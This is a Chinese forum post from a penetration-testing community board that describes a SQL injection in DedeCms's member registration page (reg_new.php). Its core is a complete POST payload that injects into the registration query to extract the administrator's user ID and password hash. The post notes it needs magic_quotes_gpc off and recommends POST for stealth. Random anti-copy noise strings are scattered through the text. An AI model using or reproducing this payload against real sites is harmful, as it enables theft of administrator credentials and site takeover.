中国网络渗透测试联盟

标题: DedeCms SQL注射漏洞再利用 [打印本页]
作者: admin    时间: 2012-12-5 10:03
标题: DedeCms SQL注射漏洞再利用
dedecms版本 20121122
; Q% [! W6 Z; v0 _& Y2 r! \% K$ X- ?9 R  s4 N
需要magic_quotes_gpc=Off
/ ]4 H* z( ?1 G3 _. n! g  }! ]& x. J6 \4 c
应该是没有什么大危害的漏洞.
8 E5 O$ [# E0 ?+ G' Z, |! O原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.1 e8 T. z2 ]% q0 v
; l( L" P2 n. H. j- [6 K
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.1 i# ^+ R6 N2 O( j+ k
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
# G& Y$ `" `8 S+ B' Y9 G* _7 G# A7 G0 j
http:///de/member/reg_new.php
/ a, v; ~& F, p# a* w7 A6 T' \& u$ H9 ~
POST
2 T% x& T3 m9 D. L( y+ i4 N3 k. ~1 a. b2 Q8 Q* i  }. S
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
5 B3 a/ S" k1 y7 b% b$ ^7 ?" \3 m5 s. M% P$ H# b. [
成功注册后,头像处里面有好玩的信息.
& E% z4 Y" r% p0 a: _# t8 D+ V2 S; `. _/ O& F" _) J




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2